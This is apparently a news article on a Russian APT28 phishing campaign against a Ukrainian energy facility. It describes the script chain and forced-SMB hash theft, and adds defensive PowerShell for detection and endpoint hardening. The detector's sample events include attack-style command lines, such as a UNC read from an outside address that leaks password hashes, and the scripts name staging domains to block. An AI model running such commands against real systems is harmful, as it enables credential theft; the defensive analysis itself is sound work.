
APT28 Spear-Phishes Ukrainian Critical Energy Facility

Energy Facility Impeded Attack by Blocking the Launch of the Windows Script Host
Ukrainian soldiers from the 72nd Mechanized Brigade in a photo dated Jan. 24, 2023 (Image: Ministry of Defense of Ukraine)

Ukrainian cyber defenders said Russian military hackers targeted a critical energy infrastructure facility with phishing emails carrying a malicious script used for cyberespionage.


The Computer Emergency Response Team of Ukraine on Monday attributed the campaign to APT28, the Russian GRU hacking group also known as Fancy Bear and Forest Blizzard, the name Microsoft now uses for the group it formerly tracked as Strontium.

The Russian state hacking group has been behind a number of spear-phishing campaigns against Kyiv. U.S. and U.K. authorities earlier this year warned that the group had been exploiting a known vulnerability to deploy malware on and gain access to Cisco routers worldwide (see: Ukraine Facing Phishing Attacks, Information Operations).

CERT-UA released the report as Ukrainian forces have reportedly breached the southern first line of Russian defenses.

GRU hackers sent emails with a zip archive containing decoy jpeg files and a batch file named weblinks.cmd. Running the batch file opens decoy webpages, so the victim sees something plausible, while it launches a VBS script that in turn executes a second .bat file.

That batch file drives the Microsoft Edge browser in headless mode to fetch content from an attacker-controlled URL. A headless browser runs without a window and is normally used for testing or scraping; here it lets a legitimate, signed binary perform the download with nothing visible on screen. The attackers also download the Tor anonymity software onto victim computers so that stolen data can be siphoned out through The Onion Router, hiding the location of their collection infrastructure. APT28 also uses a PowerShell script that makes the victim system connect to an attacker-controlled SMB server, causing Windows to send the hash of the logged-on account's password across the SMB protocol to the attacker.
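Each stage of that chain leaves a process-creation event that a defender can hunt for: a .cmd run from an extracted archive, Windows Script Host spawned by cmd.exe, Edge started with --headless by a script rather than a user, and PowerShell touching a UNC path on an internet address. The PowerShell below is an added example written for this article, not code from CERT-UA or from the facility. It scores a batch of constructed events whose field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the process IDs, paths, the 203.0.113.10 address and the example.invalid host are made up for the sample, while mockbin.org, mocky.io and weblinks.cmd are the names given in the report.

```powershell
# Added example (not CERT-UA's or the article's code): flag the APT28 script chain in
# Sysmon-style process-creation events. Feed it Get-WinEvent output or an EDR export
# with the same field names.

function Find-ScriptChainIndicators {
    param([Parameter(Mandatory)][object[]]$Events)

    $hits = foreach ($e in $Events) {
        $img    = [IO.Path]::GetFileName([string]$e.Image).ToLowerInvariant()
        $parent = [IO.Path]::GetFileName([string]$e.ParentImage).ToLowerInvariant()
        $cmd    = [string]$e.CommandLine

        # Stage 1: cmd.exe running a .cmd/.bat straight out of Temp or Downloads,
        # which is where an archive opened from a mail client is extracted.
        if ($img -eq 'cmd.exe' -and $cmd -match '\.(cmd|bat)\b' -and $cmd -match '(?i)\\(Temp|Downloads)\\') {
            [pscustomobject]@{ Stage = 'batch-from-archive'; ProcessId = $e.ProcessId; CommandLine = $cmd }
        }
        # Stage 2: Windows Script Host launched by the batch file (the VBS stage).
        if (($img -in @('wscript.exe', 'cscript.exe')) -and $parent -eq 'cmd.exe') {
            [pscustomobject]@{ Stage = 'wsh-from-batch'; ProcessId = $e.ProcessId; CommandLine = $cmd }
        }
        # Stage 3: Edge in headless mode with a script as its parent, or any process
        # naming the two staging domains the facility ended up blocking.
        $scriptParent = $parent -in @('cmd.exe', 'wscript.exe', 'cscript.exe')
        if (($img -eq 'msedge.exe' -and $cmd -match '(?i)--headless' -and $scriptParent) -or
            $cmd -match '(?i)mockbin\.org|mocky\.io') {
            [pscustomobject]@{ Stage = 'headless-edge-or-staging-domain'; ProcessId = $e.ProcessId; CommandLine = $cmd }
        }
        # Stage 4: PowerShell opening a UNC path on a non-RFC1918 address, the pattern that
        # makes Windows send the account's NTLM password hash to an outside SMB server.
        if ($img -eq 'powershell.exe' -and $cmd -match '\\\\(\d{1,3}(?:\.\d{1,3}){3})\\') {
            $ip = $Matches[1]
            if ($ip -notmatch '^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)') {
                [pscustomobject]@{ Stage = 'smb-to-internet'; ProcessId = $e.ProcessId; CommandLine = $cmd }
            }
        }
    }
    if ($null -eq $hits) { return @() }
    @($hits)
}

# Constructed sample events modelled on the chain in the report. Only the last one is benign.
$sampleEvents = @(
    [pscustomobject]@{ ProcessId = 4120; Image = 'C:\Windows\System32\cmd.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'cmd.exe /c "C:\Users\op\AppData\Local\Temp\Temp1_photos.zip\weblinks.cmd"' }
    [pscustomobject]@{ ProcessId = 4188; Image = 'C:\Windows\System32\wscript.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'wscript.exe //B C:\Users\op\AppData\Local\Temp\stage.vbs' }
    [pscustomobject]@{ ProcessId = 4200; Image = 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'msedge.exe --headless --disable-gpu https://example.invalid/' }
    [pscustomobject]@{ ProcessId = 4310; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'powershell.exe -nop -c "Get-Content \\203.0.113.10\share\x.txt"' }
    [pscustomobject]@{ ProcessId = 5000; Image = 'C:\Windows\System32\cmd.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'cmd.exe /c dir' }
)

Find-ScriptChainIndicators -Events $sampleEvents | Format-Table -AutoSize
```

Run against the sample, the function returns four findings, one per stage, and ignores the plain `cmd.exe /c dir`. Any single stage can occur legitimately; the signal is several of them on one host within minutes of a mail attachment being opened, so correlate by host and time rather than alerting on each row.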

A cyber defender at the energy facility blunted the attack by blocking access to mockbin.org and mocky.io, the services the scripts used for staging, and by preventing the Windows Script Host from launching, which stopped the VBS stage of the chain from running, CERT-UA said.
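The two controls the facility is credited with can be pushed to a Windows endpoint in a few lines, together with the one the report implies, a block on outbound SMB so a forced authentication cannot leak a password hash to the internet. The PowerShell below is an added example and not CERT-UA's, the facility's or the article's own configuration. It assumes an elevated shell on the endpoint, that the hosts file and Windows Defender Firewall are in use, and that the only domains to sinkhole are the two named in the report; the rule name is chosen here.

```powershell
# Added example (not from CERT-UA or the facility): host-level mitigations for the chain
# described in the report. Run as Administrator; in a fleet, ship the same settings by GPO.

# 1. Disable Windows Script Host machine-wide so wscript.exe/cscript.exe refuse .vbs/.js files.
#    This is the documented Enabled value under the Windows Script Host\Settings key.
$wshKey = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'
if (-not (Test-Path -Path $wshKey)) { New-Item -Path $wshKey -Force | Out-Null }
Set-ItemProperty -Path $wshKey -Name 'Enabled' -Value 0 -Type DWord

# 2. Sinkhole the two staging domains from the report. This is a host-level stopgap; the
#    durable block belongs on the DNS resolver or web proxy, which also catches subdomains.
$hostsFile = Join-Path -Path $env:SystemRoot -ChildPath 'System32\drivers\etc\hosts'
$blocked   = @('mockbin.org', 'mocky.io')
$existing  = Get-Content -Path $hostsFile -ErrorAction SilentlyContinue
$additions = foreach ($d in $blocked) {
    if (-not ($existing -match "^\s*0\.0\.0\.0\s+$([regex]::Escape($d))\s*$")) { "0.0.0.0 $d" }
}
if ($additions) { Add-Content -Path $hostsFile -Value $additions }

# 3. Block outbound SMB (TCP 445) to internet addresses so a script that opens a UNC path on
#    an attacker's server cannot make Windows send the account's NTLM hash there.
$ruleName = 'Block outbound SMB to Internet'   # name chosen for this example
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Protocol TCP -RemotePort 445 `
        -RemoteAddress Internet -Action Block -Profile Any | Out-Null
}

# 4. Verify all three controls are in place; each property should read True.
function Test-EndpointHardening {
    $wshOff   = (Get-ItemProperty -Path $wshKey -Name 'Enabled' -ErrorAction SilentlyContinue).Enabled -eq 0
    $hostsSet = @((Get-Content -Path $hostsFile) -match 'mockbin\.org|mocky\.io').Count -ge $blocked.Count
    $smbRule  = $null -ne (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)
    [pscustomobject]@{ WSHDisabled = $wshOff; DomainsSinkholed = $hostsSet; OutboundSMBBlocked = $smbRule }
}

Test-EndpointHardening
```

Two caveats before rolling this out. Disabling Windows Script Host also breaks any legitimate .vbs or .js logon and maintenance scripts, so inventory those first or use AppLocker or WDAC rules that allow only signed, known scripts. The hosts-file entries do nothing for connections made by IP address or over DNS-over-HTTPS, which is why the block should also live on the resolver or proxy.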


About the Author

Mihir Bagwe


Principal Correspondent, Global News Desk, ISMG

Bagwe previously worked at CISO magazine, reporting the latest cybersecurity news and trends and interviewing cybersecurity subject matter experts.



